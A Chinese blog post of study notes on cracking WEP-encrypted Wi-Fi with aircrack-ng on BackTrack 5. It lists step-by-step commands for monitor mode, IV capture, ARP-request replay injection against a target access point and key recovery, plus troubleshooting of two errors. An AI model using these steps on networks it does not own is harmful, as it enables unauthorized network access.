Skip to main content

 路由器网 > 新闻资讯 >

关于aircrack-ng的一些学习笔记及问题

2014-09-27 16:20 浏览:

最近无意中接触到了一些无线方面的技术资料,又发现了一个比较速度的wifi渗透方法,这个虽然没有reaver那么稳定,个人觉得在时间方面要比reaver快的多。可能做实验的笔记本太旧的原因,途中遇到几个问题,如果有同仁遇到,还请指点一二。此处先记录下这几条主要命令备忘。

 

环境是BT5,默认安装了较高版本,所以不用升级,但还是附上安装命令:

 

wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz

tar zxvf <name of source file>

cd aircrack-ng-XXX

make

make install

 

 

下面就拿WEP加密做示例:

 

查看无线网卡,一般默认是wlan0,如果有外置或其他无线网卡,那就选择相应的网卡启用即可。

 

单独查看无线网卡信息:iwconfig

 

启用无线网卡:ifconfig wlan0 up

 

 

激活网卡至监听(monitor)模式:

airmon-ng start wlan0

 

扫描当前地点无线网络信息:

airodump-ng mon0

 

开始抓包,保存为logas前缀的.ivs后缀,6为AP的频道

airodump-ng --ivs -w longas -c 6 wlan0

 

在上条命令运行的情况下,打开一个新的终端窗口,输入下面命令对目标AP进行ArpRequest注入攻击,这样采用了一种称之为ArpRequest的方式来读取ARP请求报文,并伪造大量的报文再次重发出去,以便刺激AP产生更多的数据包,从而加快破解过程。

aireplay-ng -3 -b AP-mac -h Client-mac mon0

 

当IVs值达到2万以上,可尝试下面命令破解

aircrack-ng 捕获的IVS文件

 

 

破解成功后,KEYFOUND!后面的ACSI码就是密码

 

PS:

问题1:

当在新窗口输入airodump-ng --ivs -w longas -c 6 wlan0时,遇到了报错:

ioctl(SIOCSWMODE) failed: Device or resource busy

 

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE802.11,

AEPHRD_IEEE802.11_FULL or ARPHRD_IEEE80211_PRISM instead. Make

Sysfs injection support was not found either.

 

我尝试的方法是使用命令:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo iwconfig wlan0
sudo airmon-ng start wlan0
airodump-ng --ivs -w longas -c 6 wlan0

就可以了

 

问题2:

aireplay-ng -3 -b AP-mac -h Client-mac mon0时,出现了错误:

Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

因为这条命令并不直接影响结果,暂时也没找到合适解决方法,如果各位有好的解决方法,请指点。

 

 

这里只简单的列出了主要用到的命令,仅供实验参考,不得用于非法操作,否则后果自负。本文出自 “冰辰子” 博客